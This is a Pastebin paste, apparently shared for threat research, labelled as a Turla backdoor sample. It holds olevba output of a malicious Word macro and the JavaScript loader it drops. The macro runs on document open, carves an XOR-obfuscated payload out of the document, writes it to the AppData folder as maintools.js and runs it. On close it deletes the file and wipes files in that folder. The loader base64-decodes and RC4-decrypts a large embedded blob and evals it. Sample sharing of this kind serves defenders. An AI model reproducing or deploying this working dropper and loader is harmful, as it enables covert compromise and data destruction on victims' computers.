SHARE
    TWEET
    hollerith

    turla backdoor

    Oct 4th, 2017
    1,231
    0
    Never
    Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
    1. ## Uploaded by @JohnLaTwC
    2. ## Sample Hash: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
    4. ## ---- Macro
    5. olevba 0.50 - http://decalage.info/python/oletools
    6. Flags Filename
    7. ----------- -----------------------------------------------------------------
    8. OLE:MASI-B-- ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
    9. ===============================================================================
    10. FILE: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
    11. Type: OLE
    12. -------------------------------------------------------------------------------
    13. VBA MACRO ThisDocument.cls
    14. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/ThisDocument'
    15. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    16. (empty macro)
    17. -------------------------------------------------------------------------------
    18. VBA MACRO Module1.bas
    19. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/Module1'
    20. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    21. Public OBKHLrC3vEDjVL As String
    22. Public B8qen2T433Ds1bW As String
    23. Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
    24. Dim THQNfU76nlSbtJ5nX8LY6 As Byte
    25. THQNfU76nlSbtJ5nX8LY6 = 45
    26. For i = 0 To M5wI32R3VF2g5B21EK4d - 1
    27. EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
    28. THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
    29. Next i
    30. Q7JOhn5pIl648L6V43V = True
    31. End Function
    32. Sub AutoClose()
    33. On Error Resume Next
    34. Kill OBKHLrC3vEDjVL
    35. On Error Resume Next
    36. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
    37. R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
    38. Set R7Ks7ug4hRR2weOy7 = Nothing
    39. End Sub
    40. Sub AutoOpen()
    41. On Error GoTo MnOWqnnpKXfRO
    42. Dim NEnrKxf8l511
    43. Dim N18Eoi6OG6T2rNoVl41W As Long
    44. Dim M5wI32R3VF2g5B21EK4d As Long
    45. N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
    46. NEnrKxf8l511 = FreeFile
    47. Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
    48. Dim E2kvpmR17SI() As Byte
    49. ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
    50. Get #NEnrKxf8l511, 1, E2kvpmR17SI
    51. Dim KqG31PcgwTc2oL47hjd7Oi As String
    52. KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
    53. Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
    54. Dim VUy5oj112fLw51h6S
    55. Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
    56. VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
    57. Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
    58. Dim Y5t4Ul7o385qK4YDhr
    59. If I4j833DS5SFd34L3gwYQD.Count = 0 Then
    60. GoTo MnOWqnnpKXfRO
    61. End If
    62. For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
    63. Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
    64. Exit For
    65. Next
    66. Dim Wk4o3X7x1134j() As Byte
    67. Dim KDXl18qY4rcT As Long
    68. KDXl18qY4rcT = 16827
    69. ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
    70. Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
    71. If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
    72. GoTo MnOWqnnpKXfRO
    73. End If
    74. B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
    75. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
    76. If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
    77. B8qen2T433Ds1bW = Environ("appdata")
    78. End If
    79. Set R7Ks7ug4hRR2weOy7 = Nothing
    80. Dim K764B5Ph46Vh
    81. K764B5Ph46Vh = FreeFile
    82. OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
    83. Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
    84. Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
    85. Close #K764B5Ph46Vh
    86. Erase Wk4o3X7x1134j
    87. Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
    88. R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
    89. ActiveDocument.Save
    90. Exit Sub
    91. MnOWqnnpKXfRO:
    92. Close #K764B5Ph46Vh
    93. ActiveDocument.Save
    94. End Sub
    104. Attribute VB_Name SHA1
    105. 5BD2E2B8DDC65931704C8C3EA57ADC2BB778F66A
    107. ##---- maintools.js
    108. try {
    109. var wvy1 = WScript.Arguments;
    110. var ssWZ = wvy1(0);
    111. var ES3c = y3zb();
    112. ES3c = LXv5(ES3c);
    113. ES3c = CpPT(ssWZ, ES3c);
    114. eval(ES3c);
    115. } catch (e) {
    116. WScript.Quit();
    117. }
    119. function MTvK(CgqD) {
    120. var XwH7 = CgqD.charCodeAt(0);
    121. if (XwH7 === 0x2B || XwH7 === 0x2D) return 62
    122. if (XwH7 === 0x2F || XwH7 === 0x5F) return 63
    123. if (XwH7 < 0x30) return -1
    124. if (XwH7 < 0x30 + 10) return XwH7 - 0x30 + 26 + 26
    125. if (XwH7 < 0x41 + 26) return XwH7 - 0x41
    126. if (XwH7 < 0x61 + 26) return XwH7 - 0x61 + 26
    127. }
    129. function LXv5(d27x) {
    130. var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    131. var i;
    132. var j;
    133. var n6T8;
    134. if (d27x.length % 4 > 0)
    135. return;
    136. var CHlB = d27x.length;
    137. var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) === '=' ? 1 : 0
    138. var mjqo = new Array(d27x.length * 3 / 4 - V8eR);
    139. var z8Ht = V8eR > 0 ? d27x.length - 4 : d27x.length;
    140. var t2JG = 0;
    142. function XGH6(b0tQ) {
    143. mjqo[t2JG++] = b0tQ;
    144. }
    145. for (i = 0, j = 0; i < z8Ht; i += 4, j += 3) {
    146. n6T8 = (MTvK(d27x.charAt(i)) << 18) | (MTvK(d27x.charAt(i + 1)) << 12) | (MTvK(d27x.charAt(i + 2)) << 6) | MTvK(d27x.charAt(i + 3));
    147. XGH6((n6T8 & 0xFF0000) >> 16)
    148. XGH6((n6T8 & 0xFF00) >> 8)
    149. XGH6(n6T8 & 0xFF)
    150. }
    151. if (V8eR === 2) {
    152. n6T8 = (MTvK(d27x.charAt(i)) << 2) | (MTvK(d27x.charAt(i + 1)) >> 4)
    153. XGH6(n6T8 & 0xFF)
    154. } else if (V8eR === 1) {
    155. n6T8 = (MTvK(d27x.charAt(i)) << 10) | (MTvK(d27x.charAt(i + 1)) << 4) | (MTvK(d27x.charAt(i + 2)) >> 2)
    156. XGH6((n6T8 >> 8) & 0xFF)
    157. XGH6(n6T8 & 0xFF)
    158. }
    159. return mjqo
    160. }
    162. function CpPT(bOe3, F5vZ) {
    163. var AWy7 = [];
    164. var V2Vl = 0;
    165. var qyCq;
    166. var mjqo = '';
    167. for (var i = 0; i < 256; i++) {
    168. AWy7[i] = i;
    169. }
    170. for (var i = 0; i < 256; i++) {
    171. V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;
    172. qyCq = AWy7[i];
    173. AWy7[i] = AWy7[V2Vl];
    174. AWy7[V2Vl] = qyCq;
    175. }
    176. var i = 0;
    177. var V2Vl = 0;
    178. for (var y = 0; y < F5vZ.length; y++) {
    179. i = (i + 1) % 256;
    180. V2Vl = (V2Vl + AWy7[i]) % 256;
    181. qyCq = AWy7[i];
    182. AWy7[i] = AWy7[V2Vl];
    183. AWy7[V2Vl] = qyCq;
    184. mjqo += String.fromCharCode(F5vZ[y] ^ AWy7[(AWy7[i] + AWy7[V2Vl]) % 256]);
    185. }
    186. return mjqo;
    187. }
    189. function y3zb() {
    190. var qGxZ = "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